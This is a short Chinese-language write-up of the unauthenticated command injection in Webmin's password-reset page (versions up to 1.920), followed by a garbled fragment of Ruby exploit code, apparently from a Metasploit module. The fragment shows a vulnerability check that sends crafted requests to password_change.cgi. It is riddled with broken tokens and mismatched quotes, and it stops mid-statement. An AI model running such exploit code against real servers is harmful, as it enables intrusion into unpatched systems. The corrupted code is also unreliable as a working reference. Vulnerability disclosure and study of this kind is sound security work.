前言:
Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。
影响版本:
Webmin <= 1.920
漏洞代码:
def peer
"#{ss1 ? 'https:// : ' http://' }#{rhost}:#{rport}"
end
# Target and input verification
##
def check
# check passwd change privres = send_ request_ cgi(
{
'uri' => normalize_ uri(target_ uri. path, " password_ change.cgi"),
' headers' =>
{
' Referer’=>”#{peer}/session_ login.cgi"
},
' cookie' =>" redirect=1; testing=1; sid=x; sessiontest=1"
})
if res & res.code == 200 && res.body =n /Failed/
res = send_